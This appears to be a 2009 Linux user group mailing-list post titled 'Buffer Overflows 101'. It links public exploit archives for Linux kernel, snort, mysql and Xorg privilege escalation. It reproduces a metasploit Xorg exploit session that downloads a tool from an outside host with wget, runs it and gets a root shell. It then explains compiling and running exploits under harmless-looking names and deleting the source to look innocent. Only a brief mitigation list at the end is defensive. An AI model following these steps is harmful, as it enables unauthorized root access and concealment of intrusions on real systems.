Buffer Overflows 101

Good List (from the Backtrack3 Web Archives):
http://milw0rm.com/platforms/linux

Practical Examples:

1)  linux kernel Exploits

http://milw0rm.com/exploits/2031
Affects
2.6.13 && < 2.6.17.4

Just one of many available buffer overflows in linux - to escalate privileges to root:

2) snort

http://milw0rm.com/exploits/3609

3) mysql
http://milw0rm.com/exploits/1518

4) Known Ubuntu 8.10 Overflows:

http://news.softpedia.com/news/Linux-Kernel-Vulnerability-in-Ubuntu-8-10-Update-Today-97543.shtml
Exploit file from http://milw0rm.com/exploits/1596
--------------------------------------------------------------------------------
# From Daniel Stone's Advisory
# xorg-server 1.0.0, as shipped with X11R7.0, and all release candidates
# of X11R7.0, is vulnerable.
# X11R6.9.0, and all release candidates, are vulnerable.
# X11R6.8.2 and earlier versions are not vulnerable.

# The rest is H D Moore from metasploit

Two second exploit, but if anyone is lazy:

$ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
$ tar -zpxvf xmodulepath.tgz
$ cd xmodulepath
$ ./root.sh
/bin/rm -f exploit.o exploit.so shell *.o *.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
gcc -o shell shell.c

X Window System Version 7.0.0
Release Date: 21 December 2005
X Protocol Version 11, Revision 0, Release 7.0
[ snip ]
r00t # id
uid=0(root) gid=100(users) groups=10(wheel),18(audio)...

# backup: http://www.milw0rm.com/sploits/xmodulepath.tgz

# milw0rm.com [2006-03-20]

---------------------------------end original example-------------------------------

REMEMBER!  All scripts are disabled and obfuscated so they are only available to those who are intelligent enough to also be ETHICAL.  If you are too clueless to use this script, you are not clueful enough to stay out of trouble (jail, $myservers, schools, .edu, .gov, etc.).  So if you can't read and comment that script, you can't run it.
  
General C How To:


You will need to copy the code to the server of choice.  Cut and splice will work, unless you are using a Windows systems (beware of glowing ^M's!).  We are going to copy it to a filename.c that obfuscates it's true function, like testfile.c and compile it to something like "grepfile" like a real $badguy would.

Once you have the source code on the test server in our practical example, you are going to need to compile it.

$ gcc -o grepfile test.c

If your file is named test.c then type '-o grepfile' as the parameter to gcc. This is basically your suggested name for the executable file that gcc would create. In case you typed something like the following

$ gcc test.c

You would be having a a.out in the same directory as the source C file. This is the default name of the executable that gcc creates. This would create problems when you compile many programs in one directory. So you override this with the -o option followed by the name of the executable

$ gcc -o grepfile2 test2.c

Would create an executable by the name grepfile2 for your source code named test2.c

Running the executable that you created is as simple as typing the following at the prompt.

$ ./grepfile
OR
$ ./grepfile2

It's a good idea to remove your .c source after building so that your directory looks innocent like a $badguy would.

After your code runs, you should have a fine shell.

I was able to run the mysql example on the December HackFest Fedora Core 10 system successfully to obtain root Mysql privileges (instructions for build in the script.)

I was also able to run the X11 script.  Be careful - it will restart X on Redhat or FC 10!.  It works on unpatched Ubuntu 8.10!


All you would need is "access" to a shell for buffer overflow exploits.



Mitigating Buffer Overflows


1) Remove gcc, cc, and  gdb
2) Be sure that the kernel running has /proc/kernel buffer overflow protections
3) NX (no execute) kernel patch protection for older kernels [know your version vulnerabilities]
4) SSH externally off; internal trust and access severely limited


www.Obnosis.com |  http://en.wiktionary.org/wiki/Citations:obnosis |  (503)754-4452

January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security Forensics @ UAT 1/10/09 12-3PM
Take the Black [Linux BT3] Pill and leave the InSecurity Matrix, or take the Blue MS Pill and stay happily ignorant.


Suspicious message? There’s an alert for that. Get your Hotmail® account now.